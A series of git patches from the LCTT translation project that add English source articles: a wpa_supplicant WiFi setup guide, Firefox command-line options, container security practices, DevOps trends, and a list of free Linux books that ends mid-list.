+ * **#** \- requires given command to be executed with root privileges either directly as a root user or by use of `sudo` command
+ * **$** \- given command to be executed as a regular non-privileged user
+
+
+
+### Introduction
+
+Lots of people like graphical utilities for managing their computers, but plenty don't too. If you prefer command line utilities, managing WiFi can be a real pain. Well, it doesn't have to be.
+
+wpa_supplicant can be used as a command line utility. You can actually set it up easily with a simple configuration file.
+
+### Scan For Your Network
+
+If you already know your network information, you can skip this step. If not, its a good way to figure out some info about the network you're connecting to.
+
+wpa_supplicant comes with a tool called `wpa_cli` which provides a command line interface to manage your WiFi connections. You can actually use it to set up everything, but setting up a configuration file seems a bit easier.
+
+Run `wpa_cli` with root privileges, then scan for networks.
+```
+
+# wpa_cli
+> scan
+
+```
+
+The scan will take a couple of minutes, and show you the networks in your area. Notate the one you want to connect to. Type `quit` to exit.
+
+### Generate a Block and Encrypt Your Password
+
+There's an even more convenient utility that you can use to begin setting up your configuration file. It takes the name of your network and the password and creates a file with a configuration block for that network with the password encrypted, so it's not stored in plain text.
+```
+
+# wpa_passphrase networkname password > /etc/wpa_supplicant/wpa_supplicant.conf
+
+```
+
+### Tailor Your Configuration
+
+Now, you have a configuration file located at `/etc/wpa_supplicant/wpa_supplicant.conf`. It's not much, just the network block with your network name and password, but you can build it out from there.
+
+Your file up in your favorite editor, and start by deleting the commented out password line. Then, add the following line to the top of the configuration.
+```
+ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=wheel
+
+```
+
+It just lets users in the `wheel` group manage wpa_supplicant. It can be convenient.
+
+Add the rest of this to the network block itself.
+
+If you're connecting to a hidden network, you can add the following line to tell wpa_supplicant to scan it first.
+```
+scan_ssid=1
+
+```
+
+Next, set the protocol and key management settings. These settings correspond to WPA2.
+```
+proto=RSN
+key_mgmt=WPA-PSK
+
+```
+
+The group and pairwise settings tell wpa_supplicant if you're using CCMP, TKIP, or both. For best security, you should only be using CCMP.
+```
+group=CCMP
+pairwise=CCMP
+
+```
+
+Finally, set the priority of the network. Higher values will connect first.
+```
+priority=10
+
+```
+
+
+![Complete WPA_Supplicant Settings][1]
+Save your configuration and restart wpa_supplicant for the changes to take effect.
+
+### Closing Thoughts
+
+Certainly, this method isn't the best for configuring wireless networks on-the-fly, but it works very well for the networks that you connect to on a regular basis.
+
+
+--------------------------------------------------------------------------------
+
+via: https://linuxconfig.org/connect-to-wifi-from-the-linux-command-line
+
+作者:[Nick Congleton][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://linuxconfig.org
+[1]:https://linuxconfig.org/images/wpa-cli-config.jpg
From db36d7d80c0be5cd1dcfbd9c1779cf6c5dcdc0ec Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:38:28 +0800
Subject: [PATCH 084/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20The=20most=20impo?=
=?UTF-8?q?rtant=20Firefox=20command=20line=20options?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... important Firefox command line options.md | 61 +++++++++++++++++++
1 file changed, 61 insertions(+)
create mode 100644 sources/tech/20171008 The most important Firefox command line options.md
diff --git a/sources/tech/20171008 The most important Firefox command line options.md b/sources/tech/20171008 The most important Firefox command line options.md
new file mode 100644
index 0000000000..8190be8340
--- /dev/null
+++ b/sources/tech/20171008 The most important Firefox command line options.md
@@ -0,0 +1,61 @@
+translating by lujun9972
+The most important Firefox command line options
+======
+The Firefox web browser supports a number of command line options that it can be run with to customize startup of the web browser.
+
+You may have come upon some of them in the past, for instance the command -P "profile name" to start the browser with the specified profile, or -private to start a new private browsing session.
+
+The following guide lists important command line options for Firefox. It is not a complete list of all available options, as many are used only for specific purposes that have little to no value to users of the browser.
+
+You find the [complete][1] listing of command line options on the Firefox Developer website. Note that many of the command line options work in other Mozilla-based products, even third-party programs, as well.
+
+### Important Firefox command line options
+
+![firefox command line][2]
+
+ **Profile specific options**
+
+ * **-CreateProfile profile name** -- This creates a new user profile, but won't start it right away.
+ * **-CreateProfile "profile name profile dir"** -- Same as above, but will specify a custom profile directory on top of that.
+ * **-ProfileManager** , or **-P** -- Opens the built-in profile manager.
+ * - **P "profile name"** -- Starts Firefox with the specified profile. Profile manager is opened if the specified profile does not exist. Works only if no other instance of Firefox is running.
+ * **-no-remote** -- Add this to the -P commands to create a new instance of the browser. This lets you run multiple profiles at the same time.
+
+
+
+ **Browser specific options**
+
+ * **-headless** -- Start Firefox in headless mode. Requires Firefox 55 on Linux, Firefox 56 on Windows and Mac OS X.
+ * **-new-tab URL** -- loads the specified URL in a new tab in Firefox.
+ * **-new-window URL** -- loads the specified URL in a new Firefox window.
+ * **-private** -- Launches Firefox in private browsing mode. Can be used to run Firefox in private browsing mode all the time.
+ * **-private-window** -- Open a private window.
+ * **-private-window URL** -- Open the URL in a new private window. If a private browsing window is open already, open the URL in that window instead.
+ * **-search term** -- Run the search using the default Firefox search engine.
+ * - **url URL** -- Load the URL in a new tab or window. Can be run without -url, and multiple URLs separated by space can be opened using the command.
+
+
+
+Other options
+
+ * **-safe-mode** -- Starts Firefox in Safe Mode. You may also hold down the Shift-key while opening Firefox to start the browser in Safe Mode.
+ * **-devtools** -- Start Firefox with Developer Tools loaded and open.
+ * **-inspector URL** -- Inspect the specified address in the DOM Inspector.
+ * **-jsconsole** -- Start Firefox with the Browser Console.
+ * **-tray** -- Start Firefox minimized.
+
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ghacks.net/2017/10/08/the-most-important-firefox-command-line-options/
+
+作者:[Martin Brinkmann][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ghacks.net/author/martin/
+[1]:https://developer.mozilla.org/en-US/docs/Mozilla/Command_Line_Options
From f4b6a2a7aba392ed9f85d9aa02732b99273d6516 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:41:45 +0800
Subject: [PATCH 085/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=2010=20layers=20of?=
=?UTF-8?q?=20Linux=20container=20security=20|=20Opensource.com?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...nux container security - Opensource.com.md | 131 ++++++++++++++++++
1 file changed, 131 insertions(+)
create mode 100644 sources/tech/20171009 10 layers of Linux container security - Opensource.com.md
diff --git a/sources/tech/20171009 10 layers of Linux container security - Opensource.com.md b/sources/tech/20171009 10 layers of Linux container security - Opensource.com.md
new file mode 100644
index 0000000000..b992cac2c3
--- /dev/null
+++ b/sources/tech/20171009 10 layers of Linux container security - Opensource.com.md
@@ -0,0 +1,131 @@
+10 layers of Linux container security | Opensource.com
+======
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/EDU_UnspokenBlockers_1110_A.png?itok=x8A9mqVA)
+
+Containers provide an easy way to package applications and deliver them seamlessly from development to test to production. This helps ensure consistency across a variety of environments, including physical servers, virtual machines (VMs), or private or public clouds. These benefits are leading organizations to rapidly adopt containers in order to easily develop and manage the applications that add business value.
+
+Enterprises require strong security, and anyone running essential services in containers will ask, "Are containers secure?" and "Can we trust containers with our applications?"
+
+Securing containers is a lot like securing any running process. You need to think about security throughout the layers of the solution stack before you deploy and run your container. You also need to think about security throughout the application and container lifecycle.
+
+Try these 10 key elements to secure different layers of the container solution stack and different stages of the container lifecycle.
+
+### 1. The container host operating system and multi-tenancy
+
+Containers make it easier for developers to build and promote an application and its dependencies as a unit and to get the most use of servers by enabling multi-tenant application deployments on a shared host. It's easy to deploy multiple applications on a single host, spinning up and shutting down individual containers as needed. To take full advantage of this packaging and deployment technology, the operations team needs the right environment for running containers. Operations needs an operating system that can secure containers at the boundaries, securing the host kernel from container escapes and securing containers from each other.
+
+### 2. Container content (use trusted sources)
+
+Containers are Linux processes with isolation and resource confinement that enable you to run sandboxed applications on a shared host kernel. Your approach to securing containers should be the same as your approach to securing any running process on Linux. Dropping privileges is important and still the best practice. Even better is to create containers with the least privilege possible. Containers should run as user, not root. Next, make use of the multiple levels of security available in Linux. Linux namespaces, Security-Enhanced Linux ( [SELinux][1] ), [cgroups][2] , capabilities, and secure computing mode ( [seccomp][3] ) are five of the security features available for securing containers.
+
+When it comes to security, what's inside your container matters. For some time now, applications and infrastructures have been composed from readily available components. Many of these are open source packages, such as the Linux operating system, Apache Web Server, Red Hat JBoss Enterprise Application Platform, PostgreSQL, and Node.js. Containerized versions of these packages are now also readily available, so you don't have to build your own. But, as with any code you download from an external source, you need to know where the packages originated, who built them, and whether there's any malicious code inside them.
+
+### 3. Container registries (secure access to container images)
+
+Your teams are building containers that layer content on top of downloaded public container images, so it's critical to manage access to and promotion of the downloaded container images and the internally built images in the same way other types of binaries are managed. Many private registries support storage of container images. Select a private registry that helps to automate policies for the use of container images stored in the registry.
+
+### 4. Security and the build process
+
+In a containerized environment, the software-build process is the stage in the lifecycle where application code is integrated with needed runtime libraries. Managing this build process is key to securing the software stack. Adhering to a "build once, deploy everywhere" philosophy ensures that the product of the build process is exactly what is deployed in production. It's also important to maintain the immutability of your containers--in other words, do not patch running containers; rebuild and redeploy them instead.
+
+Whether you work in a highly regulated industry or simply want to optimize your team's efforts, design your container image management and build process to take advantage of container layers to implement separation of control, so that the:
+
+ * Operations team manages base images
+ * Architects manage middleware, runtimes, databases, and other such solutions
+ * Developers focus on application layers and just write code
+
+
+
+Finally, sign your custom-built containers so that you can be sure they are not tampered with between build and deployment.
+
+### 5. Control what can be deployed within a cluster
+
+In case anything falls through during the build process, or for situations where a vulnerability is discovered after an image has been deployed, add yet another layer of security in the form of tools for automated, policy-based deployment.
+
+Let's look at an application that's built using three container image layers: core, middleware, and the application layer. An issue is discovered in the core image and that image is rebuilt. Once the build is complete, the image is pushed to the container platform registry. The platform can detect that the image has changed. For builds that are dependent on this image and have triggers defined, the platform will automatically rebuild the application image, incorporating the fixed libraries.
+
+Add yet another layer of security in the form of tools for automated, policy-based deployment.
+
+Once the build is complete, the image is pushed to container platform's internal registry. It immediately detects changes to images in its internal registry and, for applications where triggers are defined, automatically deploys the updated image, ensuring that the code running in production is always identical to the most recently updated image. All these capabilities work together to integrate security capabilities into your continuous integration and continuous deployment (CI/CD) process and pipeline.
+
+### 6. Container orchestration: Securing the container platform
+
+Once the build is complete, the image is pushed to container platform's internal registry. It immediately detects changes to images in its internal registry and, for applications where triggers are defined, automatically deploys the updated image, ensuring that the code running in production is always identical to the most recently updated image. All these capabilities work together to integrate security capabilities into your continuous integration and continuous deployment (CI/CD) process and pipeline.
+
+Of course, applications are rarely delivered in a single container. Even simple applications typically have a frontend, a backend, and a database. And deploying modern microservices applications in containers means deploying multiple containers, sometimes on the same host and sometimes distributed across multiple hosts or nodes, as shown in this diagram.
+
+When managing container deployment at scale, you need to consider:
+
+ * Which containers should be deployed to which hosts?
+ * Which host has more capacity?
+ * Which containers need access to each other? How will they discover each other?
+ * How will you control access to--and management of--shared resources, like network and storage?
+ * How will you monitor container health?
+ * How will you automatically scale application capacity to meet demand?
+ * How will you enable developer self-service while also meeting security requirements?
+
+
+
+Given the wealth of capabilities for both developers and operators, strong role-based access control is a critical element of the container platform. For example, the orchestration management servers are a central point of access and should receive the highest level of security scrutiny. APIs are key to automating container management at scale and used to validate and configure the data for pods, services, and replication controllers; perform project validation on incoming requests; and invoke triggers on other major system components.
+
+### 7. Network isolation
+
+Deploying modern microservices applications in containers often means deploying multiple containers distributed across multiple nodes. With network defense in mind, you need a way to isolate applications from one another within a cluster. A typical public cloud container service, like Google Container Engine (GKE), Azure Container Services, or Amazon Web Services (AWS) Container Service, are single-tenant services. They let you run your containers on the VM cluster that you initiate. For secure container multi-tenancy, you want a container platform that allows you to take a single cluster and segment the traffic to isolate different users, teams, applications, and environments within that cluster.
+
+With network namespaces, each collection of containers (known as a "pod") gets its own IP and port range to bind to, thereby isolating pod networks from each other on the node. Pods from different namespaces (projects) cannot send packets to or receive packets from pods and services of a different project by default, with the exception of options noted below. You can use these features to isolate developer, test, and production environments within a cluster; however, this proliferation of IP addresses and ports makes networking more complicated. In addition, containers are designed to come and go. Invest in tools that handle this complexity for you. The preferred tool is a container platform that uses [software-defined networking][4] (SDN) to provide a unified cluster network that enables communication between containers across the cluster.
+
+### 8. Storage
+
+Containers are useful for both stateless and stateful applications. Protecting attached storage is a key element of securing stateful services. Container platforms should provide plugins for multiple flavors of storage, including network file systems (NFS), AWS Elastic Block Stores (EBS), GCE Persistent Disks, GlusterFS, iSCSI, RADOS (Ceph), Cinder, etc.
+
+A persistent volume (PV) can be mounted on a host in any way supported by the resource provider. Providers will have different capabilities, and each PV's access modes are set to the specific modes supported by that particular volume. For example, NFS can support multiple read/write clients, but a specific NFS PV might be exported on the server as read only. Each PV gets its own set of access modes describing that specific PV's capabilities, such as ReadWriteOnce, ReadOnlyMany, and ReadWriteMany.
+
+### 9. API management, endpoint security, and single sign-on (SSO)
+
+Securing your applications includes managing application and API authentication and authorization.
+
+Web SSO capabilities are a key part of modern applications. Container platforms can come with various containerized services for developers to use when building their applications.
+
+APIs are key to applications composed of microservices. These applications have multiple independent API services, leading to proliferation of service endpoints, which require additional tools for governance. An API management tool is also recommended. All API platforms should offer a variety of standard options for API authentication and security, which can be used alone or in combination, to issue credentials and control access.
+
+Securing your applications includes managing application and API authentication and authorization.
+
+These options include standard API keys, application ID and key pairs, and OAuth 2.0.
+
+### 10. Roles and access management in a cluster federation
+
+These options include standard API keys, application ID and key pairs, and OAuth 2.0.
+
+In July 2016, Kubernetes 1.3 introduced [Kubernetes Federated Clusters][5]. This is one of the exciting new features evolving in the Kubernetes upstream, currently in beta in Kubernetes 1.6. Federation is useful for deploying and accessing application services that span multiple clusters running in the public cloud or enterprise datacenters. Multiple clusters can be useful to enable application high availability across multiple availability zones or to enable common management of deployments or migrations across multiple cloud providers, such as AWS, Google Cloud, and Azure.
+
+When managing federated clusters, you must be sure that your orchestration tools provide the security you need across the different deployment platform instances. As always, authentication and authorization are key--as well as the ability to securely pass data to your applications, wherever they run, and manage application multi-tenancy across clusters. Kubernetes is extending Cluster Federation to include support for Federated Secrets, Federated Namespaces, and Ingress objects.
+
+### Choosing a container platform
+
+Of course, it is not just about security. Your container platform needs to provide an experience that works for your developers and your operations team. It needs to offer a secure, enterprise-grade container-based application platform that enables both developers and operators, without compromising the functions needed by each team, while also improving operational efficiency and infrastructure utilization.
+
+Learn more in Daniel's talk, [Ten Layers of Container Security][6], at [Open Source Summit EU][7], which will be held October 23-26 in Prague.
+
+### About The Author
+Daniel Oh;Microservives;Agile;Devops;Java Ee;Container;Openshift;Jboss;Evangelism
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/17/10/10-layers-container-security
+
+作者:[Daniel Oh][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/daniel-oh
+[1]:https://en.wikipedia.org/wiki/Security-Enhanced_Linux
+[2]:https://en.wikipedia.org/wiki/Cgroups
+[3]:https://en.wikipedia.org/wiki/Seccomp
+[4]:https://en.wikipedia.org/wiki/Software-defined_networking
+[5]:https://kubernetes.io/docs/concepts/cluster-administration/federation/
+[6]:https://osseu17.sched.com/mobile/#session:f2deeabfc1640d002c1d55101ce81223
+[7]:http://events.linuxfoundation.org/events/open-source-summit-europe
From 4c2c10444846f272a74ed0f7da4a382bff759752 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:44:19 +0800
Subject: [PATCH 086/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20What=E2=80=99s=20?=
=?UTF-8?q?next=20in=20DevOps:=205=20trends=20to=20watch?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...hat-s next in DevOps- 5 trends to watch.md | 88 +++++++++++++++++++
1 file changed, 88 insertions(+)
create mode 100644 sources/tech/20171009 What-s next in DevOps- 5 trends to watch.md
diff --git a/sources/tech/20171009 What-s next in DevOps- 5 trends to watch.md b/sources/tech/20171009 What-s next in DevOps- 5 trends to watch.md
new file mode 100644
index 0000000000..cf98d6be44
--- /dev/null
+++ b/sources/tech/20171009 What-s next in DevOps- 5 trends to watch.md
@@ -0,0 +1,88 @@
+What’s next in DevOps: 5 trends to watch
+======
+
+![](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO%20Magnifying%20Glass%20Code.png?itok=IqZsJCEH)
+
+The term "DevOps" is typically credited [to this 2008 presentation][1] on agile infrastructure and operations. Now ubiquitous in IT vocabulary, the mashup word is less than 10 years old: We're still figuring out this modern way of working in IT.
+
+Sure, people who have been "doing DevOps" for years have accrued plenty of wisdom along the way. But most DevOps environments - and the mix of people and [culture][2], process and methodology, and tools and technology - are far from mature.
+
+More change is coming. That's kind of the whole point. "DevOps is a process, an algorithm," says Robert Reeves, CTO at [Datical][3]. "Its entire purpose is to change and evolve over time."
+
+What should we expect next? Here are some key trends to watch, according to DevOps experts.
+
+### 1. Expect increasing interdependence between DevOps, containers, and microservices
+
+The forces driving the proliferation of DevOps culture themselves may evolve. Sure, DevOps will still fundamentally knock down traditional IT silos and bottlenecks, but the reasons for doing so may become more urgent. Exhibits A & B: Growing interest in and [adoption of containers and microservices][4]. The technologies pack a powerful, scalable one-two punch, best paired with planned, [ongoing management][5].
+
+"One of the major factors impacting DevOps is the shift towards microservices," says Arvind Soni, VP of product at [Netsil][6], adding that containers and orchestration are enabling developers to package and deliver services at an ever-increasing pace. DevOps teams will likely be tasked with helping to fuel that pace and to manage the ongoing complexity of a scalable microservices architecture.
+
+### 2. Expect fewer safety nets
+
+DevOps enables teams to build software with greater speed and agility, deploying faster and more frequently, while improving quality and stability. But good IT leaders don't typically ignore risk management, so plenty of early DevOps iterations began with safeguards and fallback positions in place. To get to the next level of speed and agility, more teams will take off their training wheels.
+
+"As teams mature, they may decide that some of the guard rails that were added early on may not be required anymore," says Nic Grange, CTO of [Retriever Communications][7]. Grange gives the example of a staging server: As DevOps teams mature, they may decide it's no longer necessary, especially if they're rarely catching issues in that pre-production environment. (Grange points out that this move isn't advisable for inexperienced teams.)
+
+"The team may be at a point where it is confident enough with its monitoring and ability to identify and resolve issues in production," Grange says. "The process of deploying and testing in staging may just be slowing them down without any demonstrable value."
+
+### 3. Expect DevOps to spread elsewhere
+
+DevOps brings two traditional IT groups, development and operations, into much closer alignment. As more companies see the benefits in the trenches, the culture is likely to spread. It's already happening in some organizations, evident in the increasing appearance of the term "DevSecOps," which reflects the intentional and much earlier inclusion of security in the software development lifecycle.
+
+"DevSecOps is not only tools, it is integrating a security mindset into development practices early on," says Derek Weeks, VP and DevOps advocate at [Sonatype][8].
+
+Doing that isn't a technology challenge, it's a cultural challenge, says [Red Hat][9] security strategist Kirsten Newcomer.
+
+"Security teams have historically been isolated from development teams - and each team has developed deep expertise in different areas of IT," Newcomer says. "It doesn't need to be this way. Enterprises that care deeply about security and also care deeply about their ability to quickly deliver business value through software are finding ways to move security left in their application development lifecycles. They're adopting DevSecOps by integrating security practices, tooling, and automation throughout the CI/CD pipeline. To do this well, they're integrating their teams - security professionals are embedded with application development teams from inception (design) through to production deployment. Both sides are seeing the value - each team expands their skill sets and knowledge base, making them more valuable technologists. DevOps done right - or DevSecOps - improves IT security."
+
+Beyond security, look for DevOps expansion into areas such as database teams, QA, and even potentially outside of IT altogether.
+
+"This is a very DevOps thing to do: Identify areas of friction and resolve them," Datical's Reeves says. "Security and databases are currently the big bottlenecks for companies that have previously adopted DevOps."
+
+### 4. Expect ROI to increase
+
+As companies get deeper into their DevOps work, IT teams will be able to show greater return on investment in methodologies, processes, containers, and microservices, says Eric Schabell, global technology evangelist director, Red Hat. "The Holy Grail was to be moving faster, accomplishing more and becoming flexible. As these components find broader adoption and organizations become more vested in their application the results shall appear," Schabell says.
+
+"Everything has a learning curve with a peak of excitement as the emerging technologies gain our attention, but also go through a trough of disillusionment when the realization hits that applying it all is hard. Finally, we'll start to see a climb out of the trough and reap the benefits that we've been chasing with DevOps, containers, and microservices."
+
+### 5. Expect success metrics to keep evolving
+
+"I believe that two of the core tenets of the DevOps culture, automation and measurement, are never 'done,'" says Mike Kail, CTO at [CYBRIC][10] and former CIO at Yahoo. "There will always be opportunities to automate a task or improve upon an already automated solution, and what is important to measure will likely change and expand over time. This maturation process is a continuous journey, not a destination or completed task."
+
+In the spirit of DevOps, that maturation and learning will also depend on collaboration and sharing. Kail thinks it's still very much early days for Agile methodologies and DevOps culture, and that means plenty of room for growth.
+
+"As more mature organizations continue to measure actionable metrics, I believe - [I] hope - that those learnings will be broadly shared so we can all learn and improve from them," Kail says.
+
+As Red Hat technology evangelist [Gordon Haff][11] recently noted, organizations working hard to improve their DevOps metrics are using factors tied to business outcomes. "You probably don't really care about how many lines of code your developers write, whether a server had a hardware failure overnight, or how comprehensive your test coverage is," [writes Haff][12]. "In fact, you may not even directly care about the responsiveness of your website or the rapidity of your updates. But you do care to the degree such metrics can be correlated with customers abandoning shopping carts or leaving for a competitor."
+
+Some examples of DevOps metrics tied to business outcomes include customer ticket volume (as an indicator of overall customer satisfaction) and Net Promoter Score (the willingness of customers to recommend a company's products or services). For more on this topic, see his full article, [DevOps metrics: Are you measuring what matters? ][12]
+
+### No rest for the speedy
+
+By the way, if you were hoping things would get a little more leisurely anytime soon, you're out of luck.
+
+"If you think releases are fast today, you ain't seen nothing yet," Reeves says. "That's why bringing all stakeholders, including security and database teams, into the DevOps tent is so crucial. The friction caused by these two groups today will only grow as releases increase exponentially."
+
+--------------------------------------------------------------------------------
+
+via: https://enterprisersproject.com/article/2017/10/what-s-next-devops-5-trends-watch
+
+作者:[Kevin Casey][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://enterprisersproject.com/user/kevin-casey
+[1]:http://www.jedi.be/presentations/agile-infrastructure-agile-2008.pdf
+[2]:https://enterprisersproject.com/article/2017/9/5-ways-nurture-devops-culture
+[3]:https://www.datical.com/
+[4]:https://enterprisersproject.com/article/2017/9/microservices-and-containers-6-things-know-start-time
+[5]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul
+[6]:https://netsil.com/
+[7]:http://retrievercommunications.com/
+[8]:https://www.sonatype.com/
+[9]:https://www.redhat.com/en/
+[10]:https://www.cybric.io/
+[11]:https://enterprisersproject.com/user/gordon-haff
+[12]:https://enterprisersproject.com/article/2017/7/devops-metrics-are-you-measuring-what-matters
From 1958de2b4bf84b5fab8d5dcaad1d62279bd2ddcb Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:46:05 +0800
Subject: [PATCH 087/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=2025=20Free=20Books?=
=?UTF-8?q?=20To=20Learn=20Linux=20For=20Free?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...6 25 Free Books To Learn Linux For Free.md | 295 ++++++++++++++++++
1 file changed, 295 insertions(+)
create mode 100644 sources/tech/20170216 25 Free Books To Learn Linux For Free.md
diff --git a/sources/tech/20170216 25 Free Books To Learn Linux For Free.md b/sources/tech/20170216 25 Free Books To Learn Linux For Free.md
new file mode 100644
index 0000000000..e549f50ea3
--- /dev/null
+++ b/sources/tech/20170216 25 Free Books To Learn Linux For Free.md
@@ -0,0 +1,295 @@
+25 Free Books To Learn Linux For Free
+======
+Brief: In this article, I'll share with you the best resource to **learn Linux for free**. This is a collection of websites, online video courses and free eBooks.
+
+**How to learn Linux?**
+
+This is perhaps the most commonly asked question in our Facebook group for Linux users.
+
+The answer to this simple looking question 'how to learn Linux' is not at all simple.
+
+Problem is that different people have different meanings of learning Linux.
+
+ * If someone has never used Linux, be it command line or desktop version, that person might be just wondering to know more about it.
+ * If someone uses Windows as the desktop but have to use Linux command line at work, that person might be interested in learning Linux commands.
+ * If someone has been using Linux for sometimes and is aware of the basics but he/she might want to go to the next level.
+ * If someone is just interested in getting your way around a specific Linux distribution.
+ * If someone is trying to improve or learn Bash scripting which is almost synonymous with Linux command line.
+ * If someone is willing to make a career as a Linux SysAdmin or trying to improve his/her sysadmin skills.
+
+
+
+You see, the answer to "how do I learn Linux" depends on what kind of Linux knowledge you are seeking. And for this purpose, I have collected a bunch of resources that you could use for learning Linux.
+
+These free resources include eBooks, video courses, websites etc. And these are divided into sub-categories so that you can easily find what you are looking for when you seek to learn Linux.
+
+Again, there is no **best way to learn Linux**. It totally up to you how you go about learning Linux, by online web portals, downloaded eBooks, video courses or something else.
+
+Let's see how you can learn Linux.
+
+**Disclaimer** : All the books listed here are legal to download. The sources mentioned here are the official sources, as per my knowledge. However, if you find it otherwise, please let me know so that I can take appropriate action.
+
+![Best Free eBooks to learn Linux for Free][1]
+
+## 1. Free materials to learn Linux for absolute beginners
+
+So perhaps you have just heard of Linux from your friends or from a discussion online. You are intrigued about the hype around Linux and you are overwhelmed by the vast information available on the internet but just cannot figure out exactly where to look for to know more about Linux.
+
+Worry not. Most of us, if not all, have been to your stage.
+
+### Introduction to Linux by Linux Foundation [Video Course]
+
+If you have no idea about what is Linux and you want to get started with it, I suggest you to go ahead with the free video course provided by the [Linux Foundation][2] on [edX][3]. Consider it an official course by the organization that 'maintains' Linux. And yes, it is endorsed by [Linus Torvalds][4], the father of Linux himself.
+
+[Introduction To Linux][5]
+
+### Linux Journey [Online Portal]
+
+Not official and perhaps not very popular. But this little website is the perfect place for a no non-sense Linux learning for beginners.
+
+The website is designed beautifully and is well organized based on the topics. It also has interactive quizzes that you can take after reading a section or chapter. My advice, bookmark this website:
+
+[Linux Journey][6]
+
+### Learn Linux in 5 Days [eBook]
+
+This brilliant eBook is available for free exclusively to It's FOSS readers all thanks to [Linux Training Academy][7].
+
+Written for absolute beginners in mind, this free Linux eBook gives you a quick overview of Linux, common Linux commands and other things that you need to learn to get started with Linux.
+
+You can download the book from the page below:
+
+[Learn Linux In 5 Days][8]
+
+### The Ultimate Linux Newbie Guide [eBook]
+
+This is a free to download eBook for Linux beginners. The eBook starts with explaining what is Linux and then go on to provide more practical usage of Linux as a desktop.
+
+You can download the latest version of this eBook from the link below:
+
+[The Ultimate Linux Newbie Guide][9]
+
+## 2. Free Linux eBooks for Beginners to Advanced
+
+This section lists out those Linux eBooks that are 'complete' in nature.
+
+What I mean is that these are like academic textbooks that focus on each and every aspects of Linux, well most of it. You can read those as an absolute beginner or you can read those for deeper understanding as an intermediate Linux user. You can also use them for reference even if you are at expert level.
+
+### Introduction to Linux [eBook]
+
+Introduction to Linux is a free eBook from [The Linux Documentation Project][10] and it is one of the most popular free Linux books out there. Though I think some parts of this book needs to be updated, it is still a very good book to teach you about Linux, its file system, command line, networking and other related stuff.
+
+[Introduction To Linux][11]
+
+### Linux Fundamentals [eBook]
+
+This free eBook by Paul Cobbaut teaches you about Linux history, installation and focuses on the basic Linux commands you should know. You can get the book from the link below:
+
+[Linux Fundamentals][12]
+
+### Advanced Linux Programming [eBook]
+
+As the name suggests, this is for advanced users who are or want to develop software for Linux. It deals with sophisticated features such as multiprocessing, multi-threading, interprocess communication, and interaction with hardware devices.
+
+Following the book will help you develop a faster, reliable and secure program that uses the full capability of a GNU/Linux system.
+
+[Advanced Linux Programming][13]
+
+### Linux From Scratch [eBook]
+
+If you think you know enough about Linux and you are a pro, then why not create your own Linux distribution? Linux From Scratch (LFS) is a project that provides you with step-by-step instructions for building your own custom Linux system, entirely from source code.
+
+Call it DIY Linux but this is a great way to put your Linux expertise to the next level.
+
+There are various sub-parts of this project, you can check it out on its website and download the books from there.
+
+[Linux From Scratch][14]
+
+## 3. Free eBooks to learn Linux command line and Shell scripting
+
+The real power of Linux lies in the command line and if you want to conquer Linux, you must learn Linux command line and Shell scripting.
+
+In fact, if you have to work on Linux terminal on your job, having a good knowledge of Linux command line will actually help you in your tasks and perhaps help you in advancing your career as well (as you'll be more efficient).
+
+In this section, we'll see various Linux commands free eBooks.
+
+### GNU/Linux Command−Line Tools Summary [eBook]
+
+This eBook from The Linux Documentation Project is a good place to begin with Linux command line and get acquainted with Shell scripting.
+
+[GNU/Linux Command−Line Tools Summary][15]
+
+### Bash Reference Manual from GNU [eBook]
+
+This is a free eBook to download from [GNU][16]. As the name suggests, it deals with Bash Shell (if I can call that). This book has over 175 pages and it covers a number of topics around Linux command line in Bash.
+
+You can get it from the link below:
+
+[Bash Reference Manual][17]
+
+### The Linux Command Line [eBook]
+
+This 500+ pages of free eBook by William Shotts is the MUST HAVE for anyone who is serious about learning Linux command line.
+
+Even if you think you know things about Linux, you'll be amazed at how much this book still teaches you.
+
+It covers things from beginners to advanced level. I bet that you'll be a hell lot of better Linux user after reading this book. Download it and keep it with you always.
+
+[The Linux Command Line][18]
+
+### Bash Guide for Beginners [eBook]
+
+If you just want to get started with Bash scripting, this could be a good companion for you. The Linux Documentation Project is behind this eBook again and it's the same author who wrote Introduction to Linux eBook (discussed earlier in this article).
+
+[Bash Guide for Beginners][19]
+
+### Advanced Bash-Scripting Guide [eBook]
+
+If you think you already know basics of Bash scripting and you want to take your skills to the next level, this is what you need. This book has over 900+ pages of various advanced commands and their examples.
+
